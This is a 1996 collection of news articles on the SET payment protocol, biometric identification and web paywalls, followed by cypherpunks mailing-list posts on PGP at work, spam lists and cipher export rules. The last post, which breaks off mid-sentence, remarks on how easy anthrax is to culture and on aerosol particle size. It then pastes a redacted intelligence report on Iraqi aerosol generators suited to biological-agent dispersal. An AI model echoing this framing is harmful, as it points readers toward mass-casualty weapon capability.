by MasterCard, Visa, and a sometimes unruly bunch of technology
providers, went up on the card associations' Web sites in June in what
was labeled as its final form.

In other words, the standard was ready for prime time. Software
developers could begin incorporating it in systems being designed for
electronic transactions. And thus began something of a race to make
SET-- secured card payments a reality, at least in a test mode, by
yearend. The principals were too busy and running too fast to celebrate
their hard-won accomplishment. There was far more work to be done, and
in their haste to get to it they may never have adequately explained the
document's true significance.

The SET advocates met their objective. Getting past their internal
divisions, they wrote specifications for on-line credit card
transactions and were unanimous in their endorsement. Relying on data
encryption and digital certification of buyers, sellers, and bank
processors, they erected several barriers to electronic thievery.

They did not make the Net safe for all commercial and monetary activity.
Nor did they silence a number of critics who still raise warning-flags
about the Internet's inherent vulnerabilities, even those addressed by
SET.

The development of the protocol was well-chronicled. Probably too well
from the standpoint of MasterCard and Visa, which had hoped that their
mid- 1995 move to cooperate -- on the assumption that payment security
should not be a competitive venue -- would lead to a rapid conclusion of
amicable, low-profile deliberations. The diplomatic initiative derailed
in the fall of 1995 when Microsoft Corp., sitting on Visa's side of the
table, failed to reconcile with the opposing camp that included two of
Microsoft's market adversaries, International Business Machines Corp.
and Netscape Communications Corp.

After a couple of months of fence-mending, the negotiations were
declared back on track Feb. 1. Within a month the working draft of SET
was completed, supposedly drawing the best features from the initially
separate MasterCard and Microsoft-Visa proposals.

As the June deadline approached, most of the organizations directly
involved in SET -- they included GTE Corp., Science Applications
International Corp. (SAIC), and companies associated with the data
encryption leader RSA Data Security Inc. -- announced they would provide
products and services implementing the protocol.

Verifone Inc. hit the ground running June 18 with a comprehensive
electronic commerce package that it said would be the "first
implementation" of SET, supported by numerous strategic allies from the
SET circle and beyond. Said Verifone's Internet commerce division chief
Roger B. Bertman, "This will help the industry benefit more quickly from
increased Internet transaction volumes and allow us all to begin
learning by doing."

Verifone had reportedly pressed to join the SET team, only to run up
against the members' desire to stay small. But Verifone was very plugged
in, and Mr. Bertman's "learning by doing" could have been their motto.
By implication, publication of SET was just one more beginning.

At the heart of SET is data encryption technology, specifically that
provided and championed by RSA of Redwood City, Calif. In the encryption
field, science meets commerce. The plodding of the scientific method
tempers businesses' drive to get products to the market.

Further complicating any venture into encryption -- the mathematical
technique for scrambling messages to prevent unauthorized reading -- is
the overhang of public policy. RSA and its progeny have chafed at
federally imposed limits on cryptographic systems, particularly on the
length of the code-defining keys they can export. While most financial
activities are not hindered by the government's concern about "strong
encryption," any banking or payment-related activity is surely to be
scrutinized by that industry's regulatory establishment.

It is only 20 years since the advent of public key cryptography.
Improvements have been continuous, at least theoretically enabling the
guardians of secure data to stay a step ahead of criminal pursuers. That
SET could come together in a few months of concentrated effort is
testimony to the strength and durability of the concept.

As in academic tradition, what is tested and proven wins out.
MasterCard's and Visa's pre-SET attempts, Secure Electronic Payment
Protocol and Secure Transaction Technology, "didn't incorporate enough
of preexisting security standards," said Allan M. Schiffman, chief
technology officer of Terisa Systems Inc., a Los Altos, Calif., company
formed in 1995 by RSA and several other investors to develop secure
systems for Internet commerce.

"In dealing with crypto, it's nice for stuff to be out and analysts to
take a shot at it," said Mr. Schiffman, whose company was intimately
involved in SET and said back in April that it would build the protocol
into its client and server toolkits. "Older standards that aren't broken
are what crypto-developers want."

SET's reliance on the proven didn't stop the sniping.

Lee H. Stein, chairman of First Virtual Holdings Inc. in San Diego,
designed his Internet commerce system such that payment data flow via a
private communications channel rather than the World Wide Web. First
Virtual is not yet ready to bank on encryption. SET may be a step in the
right direction, but it didn't sway Mr. Stein.

"Sensitive financial information is never to be on the Internet," Mr.
Stein said at the Cyberpayments '96 conference in Dallas in June. "Has
anyone here yet seen a hierarchical, encryption-based certification
authority working at the consumer level?"

Jerome Svigals, a California-based consultant and long-time advocate of
smart cards, criticized the lack of portability of the customer
certificates required for an SET transaction. Designed to be embedded in
a personal computer, the certificates, or digital signatures, might
better comport with the credit card transaction model by being stored on
smart cards.

Aharon Friedman, chairman and chief product developer of Digital Secured
Networks Technology Inc. in Englewood Cliffs, N.J., has expressed
concern about the software-only nature of SET. He said it requires a
hardware component to be fully secure.

Mr. Friedman, a one-time SAIC research physicist who founded his network
security company last year, also said too much of an SET message is in
clear text or subjected to "hash functions" that do not provide the high
security levels of encryption.

"Unlike hardware, software can be bypassed using a computer," Mr.
Friedman said. He has suggested that a hardware-based approach be
incorporated into SET at "a more elementary level" so that all the text
can be encrypted.

"He put it aggressively," Mr. Schiffman said of Mr. Friedman. "What he
says is not wrong, but it was not unaccounted for" in SET revisions.

Other SET defenders have pointed out that the three aforementioned
critics have vested interests in, respectively, off-Internet payments,
smart cards, and hardware. Mr. Friedman said he is a few months away
from a hardware-software solution that would be economical for PCs and
even laptop computers, but he was not ready to talk about specific
pricing.

More fundamentally, the SET group had to grapple with classic questions
of appropriateness. The security measures had to fit the potential
crimes, at a reasonable cost.

As new electronic payment media develop, "people are going to realize
that they can't guarantee 100% security," Geoffrey Baehr, a top network
technology official at Sun Microsystems Inc., said at a banking
conference earlier this year. "Instead, they will aim their development
work at 100% acceptance of risk, and assume there is always some amount
of fraud.

"It happens, and there isn't much you can do about it other than best
efforts."

Focusing on the framework for card payments, the SET group put its best
efforts toward standards for transaction software and the ever-critical
authentication of cardholders, merchants, and banks, based on the
digital certificates issued and maintained by "trusted parties." A big
selling point is that merchants don't see buyers' credit card numbers;
the system transparently validates them.

RSA Data Security has a central, commercial interest in how SET develops
and has taken on an associated, almost public-service responsibility for
coordination.

"SET is definitely the way to go to secure bank card transactions," said
Kurt Stammberger, RSA's director of technology marketing. "We believe it
will be huge. Otherwise we wouldn't have built a toolkit around it."

Indeed, the "RSA Encryption Engine" brand will be on Verifone's software
products -- vGate, vPOS, and vWallet -- the first of what should be many
SET-related licenses.

Because there will be a proliferation of on-line products, especially
the virtual wallets at the consumer level, Mr. Stammberger said "RSA's
role will be to make sure all the wallet implementations talk to all the
merchant implementations and the banks."

"Building cryptography is not trivial, but getting all the right people
talking to each other can be even more of a challenge," Mr. Stammberger
said.

Meanwhile, Verisign Inc., spun off by RSA 17 months ago, is going after
the certification piece of the business. In July it announced it was
chosen by Visa International to provide Internet authentication through
the member banks. Building a global infrastructure for the
encryption-based certification product it calls Digital ID, Verisign
views the Visa deal as a big mass-market opening for digital signatures.

"The financial services industry is leading the charge in bringing
Internet commerce to the consumer," said Verisign president and chief
executive officer Stratton Sclavos, who has also signed breakthrough
licensing pacts with Microsoft and Netscape. He expects market
availability of his "high-volume, scalable-to-the-millions" product "as
soon as SET is ready," by early next year.

MasterCard designated the CyberTrust unit of GTE Corp., one of its
partners in the SET project, as its private-label certificate provider.
The announcement, within days of Visa-Verisign in late July, prompted
some one- upmanship. MasterCard senior vice president Steve Mott
predicted GTE would be "bigger, better, and faster" in the market.

Visa U.S.A. president Carl Pascarella wanted to underscore that the
Verisign-GTE face off means healthy competition, not a return to the
earlier SET dissension.

He said the card associations rejected the idea of a single
certification authority because it could have been monopolistic. And
while Visa members can now choose Verisign, and MasterCard members GTE,
they could also be their own "CA" or pick from other suppliers.

"Visa and MasterCard agreed to pursue different certification options,"
he said. "The technology will be more robust, and it will minimize the
impact on issuers and acquirers.

"Things are changing so fast, we don't want to be in the position of
driving stakes into the ground. Our concern right now is to protect the
banks, and SET does that."



The Miami Herald: Monday, September 16, 1996

Firm Hopes Facial "Signature" to be Foolproof

Don't look for twenty-something computer nerds at Identification
Technologies International in Coral Gables. ITI, a high-tech firm
founded in 1993, is run by David Bendel Hertz, an energetic
septuagenarian.

Hertz has held executive engineering positions at RCA and Celanese, has
been a partner at the consulting firm McKinsey & Co. in New York and has
taught business and law at the University of Miami.

His latest venture focuses on a facial recognition system, with
applications from building access to internet banking.

"We are a start-up business, a research and development company," says
Hertz, 77. "And now we're becoming an operative company."

Hertz saw an opportunity in 1994. Conventional facial recognitions
systems "were too slow and took too much computer memory," he says. And
stored on a hard drive, the data were vulnerable to hackers.

Hertz calls his solution One-to-One. It uses a camera to take a person's
photo and compares it to a facial "pixel signature." The signature uses
only 96 bytes of memory -- as opposed to 500 to 2,000 bytes in
conventional systems -- and can be easily stored on a smart card. Hertz
insists that even the most intelligent hacker won't be able to break
into the system because the data is not available on a central computer
system and a stolen smart card will not match the thief's facial
characteristics.

Hertz allows that ITI has spent more than $1 million so far, half from
him and half from Peipers, a New York investment company.

ITI offers its system in the form of a small black box, containing the
camera and connected to a computer. One-to-One uses little memory
because it focuses on specific characteristics, such as the position of
the eyes and the form of the mouth, while older systems store a
photo-like image of the face.

"When we started," Hertz says from a University of Miami test lab, "the
first thing we did was ask a plastic surgeon if there are sufficient
differences between faces.

"'Every face is different,' he answered. But what about identical twins,
we wanted to know. "The surgeon said there are enough differences in
their faces that some people -- like their mother -- always can
recognize them."

Using biometrics, the branch of biology that deals with data
statistically and by mathematical analysis, One-to-One can recognize
these differences as well as a mother.

A niggling problem, however, is that the system may not recognize a
characteristic that is not part of your signature, such as a new haircut
or even a smile.

So far, ITI has made 50 units, mostly for testing and evaluation. Priced
at $2,000-$3,000, two of the units have been sold to Westinghouse
Security Electronics, which does not manufacture facial recognition
systems. Jorge Sousa, director of product development at Westinghouse's
systems division, based in Santa Clara, Calif., says he is "convinced
that biometrics has a future," and that his company is keenly interested
in ITI's product.

Citicorp is currently testing Hertz's system on its ATMs, and AktivNet,
a Miami company, has agreed to try out 400 units in 1997 on its
communications kiosks in airports and hotels geared to business
travelers.

Hertz has also presented One-to-One to the National Security Agency,
which he says "exhibited high-level interest."

ITI is being marketed in Europe, South Africa and the Middle East by a
Dutch company, Digistration. Hertz sees customers ranging from airports
to welfare agencies to sports arenas. "The market is large and growing
every day," he says.

David Leibowitz, managing director and analyst at Burnham Securities in
New York, also sees a rising interest in sophisticated security systems.
"There is every likelihood that more creative devices will be needed,"
said Leibowitz, who added that with the rise in crime and theft, "The
security market is growing at a dramatic pace."

Leibowitz points out that the security market can include everything
from barbed-wire fences to combination locks to the high-tech devices
manufactured by such companies as Sensormatic, Checkpoint and Knogo .
"Should ITI's product prove itself in tests and go on to succeed in
real-world applications," he said, "there is a good chance there would
be a market for it." But he cautioned that between now and then,
competitors may have developed similar or more innovative systems that
affect ITI's potential to market its product.

Hertz plans to hire 10 additional employees to market and distribute ITI
products. They will join the 12 people currently on staff, an
international group including a computer programmer, biomedical
scientist and mathematical analyst.

Their work has far-reaching implications: Hertz envisions a day when ITI
develops systems and products that, for example, has the capability to
"detect people in a crowd," to catch fugitives or help find missing
persons.


Retail Banker International: August 22, 1996

Chase Builds "Best Biometric"

CHASE MANHATTAN is currently testing biometric voice printing for retail
banking applications in two pilots in the New York area. The bank said
these tests will be concluded before year-end, and could lead to the
introduction of biometric voice printing in several retail channels as
early as 1997.

The two pilots now in progress are testing voice printing at branch
offices, the most challenging environment for voice printing, due to
ambient noise and distortion. Branch customers pick up a phone on the
teller line and verify their identities instantly, saving the teller the
time needed to check the validity of each customer's bank card.

But the system's most dynamic application will be in remote delivery,
and especially in phone banking, where customers' identities can be
automatically verified as soon as they speak, allowing phone reps to
call up all account data instantaneously. The bank expects to roll out
voice printing first in high-risk wholesale operations, like funds
transfer and treasury services, before introducing it to the retail side
of the bank.

"Voice is the best biometric," said Elizabeth Boyle, Chase VP for
strategic implementation in New York. First, voice printing offers
security in all channels, an advantage that techniques like
fingerprinting and dynamic signature analysis do not enjoy. This means
that customers can use the system for remote transactions and can open
accounts without visiting a branch, for example.

Second, customers are most comfortable with voice printing, which is
considered far less intrusive that fingerprinting, for instance, and is
completely invisible over the phone. Lastly, voice printing is the most
effective security system, yielding the lowest percentage of false
positives, and just as important, the lowest rate of false negatives.
"We do not want to be in the position of telling customers that they are
not who they are," Boyle explained.

Chase's voice printing pilots use technology developed by Votan of
Pleasantville, California, a firm currently under registration for an
initial public offering valued at $30 million. Direct mutual funds
provider Fidelity Investments is also working on the implementation of
voice printing technology, and Citibank is currently running voice
pilots by four separate vendors.

Boyle said that twelve months ago, Chase decided against multiple-
vendor pilots, believing the technology was changing too rapidly to make
this approach economical.


New York Times: Monday, September 16, 1996

Testing Whether Internet Readers Will Pay

By MIKE ALLEN

After extending its grace periods four times, The Wall Street Journal
Interactive Edition says it will bar freeloaders from its World Wide Web
site beginning Saturday.

The results are being watched as a bellwether for prospects of charging
for access to Web sites. Because of The Journal's fame and its high
proportion of business users, founders of other sites figure that if The
Journal does not succeed, they may have no chance of charging in the
foreseeable future.

Today's Web is a money pit, with sites getting some revenue from
advertisers but virtually none from users.

Nick Donatiello, a market researcher who surveys consumer attitudes
about new technologies, said subscription fees might work in a special
case like The Journal, but would remain rare.

``Consumers can surf the whole Web for less than $20 a month, so it's
hard to convince them that they should pay for one little slice out of
this enormous pie,'' said Donatiello, the president of Odyssey LP, a
research firm in San Francisco. ``Paying for content is going to be
dwarfed by having advertisers pay, not because the Web has a culture of
free content, but because television has a culture of
advertising-supported content.''

A message on the Journal's site (http://www.wsj.com) says, ``Avoid the
rush and convert now to a paid subscription.'' The interactive Journal
is charging $49 a year, or $29 to those who take the print Journal,
which runs $164 a year.

Neil F. Budde, the editor of the interactive edition, said many people
were philosophically opposed to paying for information on the Web. But
he said others would subscribe because of the site's features like
Briefing Book, which offers news about a company, charts of stock
performance and five years of financial data.

``These are not the people who have been on the Internet since Day
One,'' he said. ``These are newer people, people who are in business,
who say it's worth it not to have to look four different places on the
Internet'' to find information that the Journal site pulls together.

About 650,000 people registered during the interactive Journal's trial
period. Thomas Baker, the business director of the interactive edition,
said surveys of those users indicated 10 to 30 percent were willing to
pay.

``If, at the end of the year, we had 20,000 to 25,000, that would be
good,'' Baker said. ``We're realists. Our expectations are fairly
modest. We look at this as a magazine start-up, and even successful
magazines take a while to ramp up.''

Baker said only 20 to 25 percent of those surveyed subscribed to the
print Journal. ``That helped allay people's fear of the cannibalization
of the print readership,'' he said.

When the site opened in April, it offered free access through July 31.
That was extended to Aug. 31, then Sept. 21. The deadline to register
was May 31, then June 30, then Aug. 1.

There is still a loophole: Access to the on-line Journal is free through
Dec. 31 to those who download the Microsoft Corp.'s Web browser,
Internet Explorer. Also free: two-week trials of the Journal site.

Barron's, a weekly that like the Journal is published by Dow Jones &
Co., thought big when it announced its Web site in May, saying it
planned to charge $99 a year for basic access, and even more for premium
areas like an Investors Workstation.

That would have made it the most expensive mass-market site on the Web.
The plan has been rethought. Barron's Online (http://www.barrons.com)
has remained free, and a spokesman said the future subscription price
had not been determined.

The Web site of The New York Times requires users to register but does
not charge. About 600,000 have signed up since the site
(http://www.nytimes.com) opened in January.

``Our view is that market share is a more important criterion for
success than whether you can get a few people to pay for the service,''
said Martin A. Nisenholtz, the president of The New York Times
Electronic Media Co. ``But we continue to evaluate our users'
willingness to pay for information on line.''

The other best-known news sites, including those from CNN, USA Today,
The Washington Post and The Los Angeles Times, are open to all. ESPN's
site (http://espnet.sportszone.com) charges $39.95 a year for access to
premium areas, including columnists. But that service, too, is free
until the end of the year through Microsoft Explorer.

Microsoft, meanwhile, has found an old-fashioned way to get some income
from its on-line magazine, Slate: sell paper copies.

Slate on Paper went on sale this month in many Starbucks coffee
boutiques, and mail subscriptions are available. The 62-page digest of
the on-line version is produced in Microsoft's print shop.

The paper Slate is $29.95 a year. That's $10 more than the on-line
version will be when it starts charging for access on Nov. 1.

The site (http://www.slate.com) was started in June with great fanfare
from traditional media, but it continues to be skewered in the on-line
world. The September issue of Wired magazine inaugurated the Kinsley
Deathwatch, a pool to predict when Michael Kinsley, Slate's editor, will
return from Redmond, Wash., to the other Washington.

Slate on Paper, which includes about one-third of the Web version,
includes an editors' note heralding ``the transmutation of all-digital
Slate to the fusty comfort of analog paper and ink.''

``To the best of our knowledge, Slate on Paper is the first Webzine to
reverse the process,'' the note says. ``Some say it is fitting for two
companies so closely associated with the image of Seattle - Microsoft
and Starbucks - to be be joining forces. Others say it is beyond
parody.'' A parody site, Stale (http://www.stale.com), pretends to offer
a printed version, ``thereby defeating the purpose of being on the
Web.''

Rogers Weed, Slate's publisher, said the print edition was ``a bridge to
the people that aren't on the Internet today.''

But how many Starbucks customers want Chechnya with their frappuccino?
Even some of the chain's employees are puzzled. ``This is Starbucks
coffee,'' said Carol Hensler, who worked at a store in Richmond, Va.
``We only have coffee and coffee products.''

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 18 Sep 1996 17:09:38 +0800
To: osborne@gateway.grumman.com (Rick Osborne)
Subject: Re: PGP in the workplace
In-Reply-To: <3.0b16.32.19960917232055.005410c0@gateway.grumman.com>
Message-ID: <199609180543.WAA25405@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Rick Osborne writes:
> 
> Here's one I figure you all would just love:

[...]

> Upon explaining to them that I was simply trying to make sure of my own
> security, I was told that I was to just assume that I was secure, and that
> *any* 'poking around' was found to be "highly aggravating" and could only
> only "exascerbate the situation further."


Quit and go work somewhere that's reasonable.  A decent IS department
doesn't play games like these; one that's full of morons does.

Talented people, especially those who know security, are
in demand at the moment.  So you shouldn't have to put up with
petty-tyrant bullshit- go find a company that is staffed by human beings.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 18 Sep 1996 13:31:00 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "But if it saves just one child."
In-Reply-To: <ae64aebc0902100428a4@[207.167.93.63]>
Message-ID: <Pine.BSI.3.91.960917230546.23148A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy boy,
I yelled at someone for this last week.
And you supported my view.

Never read Ayn Rand, eh?

-Millie
two sides, both sarcastic ==> chaos

On Tue, 17 Sep 1996, Timothy C. May wrote:

> At 1:52 AM 9/18/96, "" <pstira@escape.com> wrote:
> >On Mon, 16 Sep 1996, attila wrote:
> >
> >> = .The rallying cry heard so often these days: "But if it saves just one
> >>child."
> >> = .
> >
> >
> >ACCKKKKKIK.
> >
> >SYN
> >ACK
> >GAK
> >BLAH.
> >
> >Read some Ayn Rand.
> >This must end.
> >
> >IOW:  I call bullshit.  I call total bullshit.
> >The net, fomerly my oasis, needs death.
> 
> Millie,
> 
> First, Attila was quoting my comment. Second, this was sarcasm.
> 
> (Or, variously, facetiousness, tongue-in-cheek, and other varieties of irony.)
> 
> You really need to learn when someone is _supporting_ your point of view
> through such uses of irony, rather than going ballistic, Just a Modest
> Proposal, as it were, he said Swiftly.
> 
> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 18 Sep 1996 18:55:22 +0800
To: tdell@netscape.com
Subject: Re: Wealth Tax vs. Capital Gains Tax Reduction
In-Reply-To: <ae6440c1040210045195@[207.167.93.63]>
Message-ID: <323F9328.7317@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


My comment on the below: For an excellent overview of what the *really* 
big guys with the *really* big jobs (asst. sec. of state, undersec. of 
treasury, etc.) have in mind, try to get a video of something called the 
"World Economic Development Council" meeting, hosted by Nicholas Brady, 
Lawrence Summers et al, somewhere around Nov. 1992, and broadcast on 
C-Span. Despite the personal appearance of all the heavy hitters, the 
look of the program is akin to "Alphaville" or some such film.

When you watch, you'll think you've entered the Twilight Zone, but the 
Alphaville look won't be the main reason for that. Allow me to 
paraphrase just one of the juicy offerings from Mr. Summers: "When we 
get this thing in place, if any of those blah blah blah countries gives 
us any shit, we'll jerk the rug out from under them in a heartbeat.", 
or, in the words of the infamous Joey the Hit Man, "We'll crush 'em like 
a bug".

In any case, this video is the very best example I've seen of the 
opposing point of view to T.C. May's Crypto Anarchy. Chilling, in a 
word.

> Thomas Dell wrote:
> Needless to say, I despise the idea of a "wealth tax," and I can
> see various loopholes and workarounds. I'd also expect a lot of
> folks to simply move out of the country if this were to happen........
>          The Expat Tax Is Law - The Door Is Now Closed!
>                                by
>                          Marc M. Harris
>      After last year's failed attempt to pass an American
> expatriate tax, the U.S. Treasury Department succeeded in
> sneaking the provisions into the miscellaneous revenue positions
> of the recently passed Health Coverage Availability and
> Affordability Act of 1996.  Given the failure of their high
> profile campaign last year, the Treasury Department switched
> strategies this year and undertook one of stealth.  While the
> press was talking about tax-deductible contributions to medical
> savings accounts (MSAs), provisions tightening the expatriation
> tax rules were implemented.  Foreign grantor trust rules were
> also tightened under the law........
>           "It has come to the attention of Congress that some
>      very wealthy individuals have been relinquishing their
>      citizenship to avoid U.S. income, estate and gift tax.  The
>      bill does not want to discourage citizens from exercising
>      their right to expatriate, but does not want to provide a
>      tax incentive for such an action...".......
>      If these provisions were making you feel a bit suicidal,
> please forget it.  Uncle Sam is not only going to pursue you to
> the grave, but also your executors and heirs........
>                         About the Author
>      Marc M. Harris is a certified public accountant and
> president of The Harris Organization.  He has already developed a
> strategy for legally avoiding the expat tax, which he discusses
> only in personal appointments.
>                 Copyright 1996 by Marc M. Harris





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Wed, 18 Sep 1996 14:37:44 +0800
To: cypherpunks@toad.com
Subject: PGP in the workplace
Message-ID: <3.0b16.32.19960917232055.005410c0@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's one I figure you all would just love:

Yesterday afternoon, I was told by some higher-level associates of mine
(not Management level, mind you, just people higher on the food chain) that
my use of PGP in the coporate environment was not appreciated and could
result in my being looked upon *very* unfavorably by the managerial crowd.
Without even delving into security reasons, I politely explained to them
that due to my job (which has several crypto-related applications) I needed
PGP to communicate with people and list-bots in the outside world (or they
could gladly pay for my formal training).  The just shook their heads and
said "be careful, you've been noticed".  I was then told to stop 'messing
around' in my shell account.  I asked what was meant by this, and
apparently it had been noticed that I had done a few things, which I had
done to simply check the security of my account, which could be viewed as
'inappropriate'.  You know what they were?

1. I checked to see if the passwd file was available to anyone (was it
shadowed, etc.).  This was seen as an attempt to GET the passwd file, and
thereby have access to sensitive data.

2. I change my password regularly (once a week).  Now this may seem
excessive (it apparently did to them), but you must understand that the
entire IS department is extremely buddy-buddy here.  Over half of the users
have root passwords on any given system.  I don't feel like sharing,
horrible me.  I guess my regular chaning of passwords was seen as a strain
on the system (ha!), as they didn't elaborate *why* I had been flagged for
this.

Upon explaining to them that I was simply trying to make sure of my own
security, I was told that I was to just assume that I was secure, and that
*any* 'poking around' was found to be "highly aggravating" and could only
only "exascerbate the situation further."

Luckily, I had to get to class, so I cut the conversation before it could
get any more out of control.

Now, seeing as I'm fairly new to the Corporate world, but is this something
common?  I know when I was at college, poking around was expected and
encouraged, as it helped find and plug holes in the system.  But this is
almost like some kind of protection racket here!


____________________________________________________________
Rick Osborne                     osborne@gateway.grumman.com
"Yes, evil comes in many forms, whether it be a man-eating
 cow or Joseph Stalin, but you can't let the package hide
 the pudding!  Evil is just plain bad!  You don't cotton to
 it.  You gotta smack it in the nose with the rolled-up
 newspaper of goodness!  Bad dog!  Bad dog!" - The Tick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 15:04:41 +0800
To: cypherpunks@toad.com
Subject: Re: Spam blacklist project
In-Reply-To: <3.0b19.32.19960917191100.0069a12c@pop.ricochet.net>
Message-ID: <VPmFuD102w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles <gbroiles@netbox.com> writes:

> At 12:52 PM 9/17/96 -0400, Rabid Wombat wrote:
>
> >I'd say it's a safe bet that the unscrupulous could easily sell a large,
> >up-to-date list of email addresses of people who DON'T want junk email to
> >people who want to send such mail.
>
> That's why the list should be distributed (as the original poster
> mentioned) in hashed format - the junk email people would then hash their
> own list(s), and would know not to send to addresses where the hashes
> matched. The unmatched hashes addresses on the "block" list aren't
> otherwise useful to the junk e-mail folks.

That's an excellent idea! Store the SHA5 of the do-not-e-mail addresses
and have the scrubbing program compute SHA5 of the addresses on the
spammer's list and delete the ones that match. I guess, fold the case
and normalize the %-hacked addresses.

> It's an interesting idea .. but who is going to pay for it? (doh.)

Not one of the spammers. Perhaps someone at an .edu site. Perhaps some
ISP, for free publicity.

I'd expect that the service would get a lot of e-mail traffic for the
first few weeks, while everyone who cares about it would get their
addresses on the list; and then it'll be just another FTP server.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Wed, 18 Sep 1996 00:21:00 +0800
To: cypherpunks@toad.com
Subject: Re: [Long] A history of Netscape/MSIE problems
Message-ID: <84296097823886@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


In case anyone's interested, I've finally found the source I used for the 
claim that RC2/RC4 were exportable if the details were kept quiet:
 
  "Details about them [RC2 and RC4] have not been published (including by 
   patenting) in order to maintain their special export status".
   
       -- RSA FAQ, version 1.0, draft 1e, 14 September 1992, p.40.
 
This makes sense - the NSA wouldn't want the details published to stop non-US 
non-crippled versions appearing, and I can't really imagine RSADSI volutarily 
not patenting a new algorithm.
 
Peter.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Wed, 18 Sep 1996 20:07:15 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Fear of Flying -- from HotWired
Message-ID: <v02130501ae64e8e781a3@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 17 Sep 1996, Adamsc wrote:
>
>> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote:
>>
>> >>... former CIA director James Woolsey: responded with some seemingly
>> >>   gratuitous anti-Net
>> >>   rhetoric. Terrorists may use biological weapons like anthrax, he said.
>> >>   "Anthrax is colorless, odorless, and has a 90 percent lethality. One
>> >>   gram has 100 million lethal doses." Then Woolsey delivered the zinger:
>> >>   "The knowledge of how to make anthrax is widely available, including
>> >>   on the Internet."
>>
>> >Gee, biotech has come a long way.  Now I can download the Anthrax DNA
>> >sequence from the net and insert it in some carrier bacteria and start
>> >making Anthrax bacteria.  Neat!
>
>Culturing and growing anthrax is painfully simple.  No DNA required.
>
>> >BTW - My dictionary says that Anthrax is primarily an animal disease which
>> >only occasionally infects humans.  It sounds like a poor choice for bio-war
>> >terror.
>
>Incorrect.  It is highly problematic and very nasty when it is properly
>delivered.  The hardest thing about anthrax is to get an areosol fine
>enough to present an inhalation risk.  (This is why it does not
>generally cause problems in humans- it's rare for it to get this fine).
>

Why not learn from the pros:

IRAQI  BIOLOGICAL WARFARE [BW) DEVELOPMENTS

Filename:0119pgv.00p
[
(b)(2)   ]


 
[   (b)(2)   ]

     

SUBJ:    IRAQI  BIOLOGICAL WARFARE [BW) DEVELOPMENTS


1.  [      (b)(1) sec 1.3(a)(4)    ] IRAQ  ACQUIRED

FORTY HIGH
PERFORMANCE AEROSOL GENERATORS IN  THE  SPRING  OF'  

1990 OSTENSIBLY  FOR
SPRAYING  CROPS WITH PESTICIDES.    THE  

GENERATORS  WERE  CUSTOM  BUILT
TO  DELIVER  EITHER  LIQUID OR 

DRY MATERIAL  EITHER  SIGNLY  OR
SIMULTANEOUSLY.   THE GENERATORS 

CAN DISTRIBUTE FIFTY  LITERS  PER MINUTE
[3-,0O0  LITERS  PER  

HOUR OR APPROXIMATELY 800 GALLONS  PER  HOUR)
THROUGH A  CUSTOM  

DESIGNED NOZZLE[S] WHICH PERMITS  THE AEROSOL TO
BE

ADJUSTED  TO  TEN DIFFERENT PARTICLE SIZES.    THE  DISSEMINATION


OUTLET CAN  BE  ROTATED  ONE  HUNDRED  AND EIGHTY DEGREES  THEREBY


ENABLING DISSEMINATION  HORIZONTAL  TO GROUND OR WATER SURFACES, 
OR

UPWARDS  AT AN ANGLE PERMITTING PREVAILING WINDS TO CARRY THE  

AEROSOL.
THE IRAQI  ENTITY WHICH ACQUIRED THE AEROSOL GENERATORS 

IS  NOT  KNOWN
AT THIS  TIME  BUT  COULD  VERY WELL BE CONNECTED 
 
TO  THE  IRAQI
BIOLOGICAL
[   (b)(2)   ]
WARFARE BW PROGRAM.



2.      THE AEROSOL  GENERATORS ARE OF SUCH--SIZE TO FIT ON THE

BACK  OF A
PICKUP  TRUCK  OR  A SMALL ALL-TERRAIN VEHICLE, A 
SMALL 
BOAT, OR SMALL
AIRCRAFT.   THESE UNITS WOULD BE SUITABLE FOR THE 

DISPERSAL  OF BW AGENTS
IN EITHER LIQUID  OR  DRY  FORM.  THE 

ABILITY  TO  DISPENSE
SIMULTANEOUSLY TWO BW AGENTS AT THE SAME 

TIME.  SUCH UNITS, HOWEVER,
WOULD THEMSELVES BECOME HEAVILY 
CONTAMINATED DURING USE AND WOULD REQUIRE
DECONTAMINATION TO 
RENDER THEM SAFE.  PERSONNEL OPERATING SUCH UNITS WOULD
AT A 
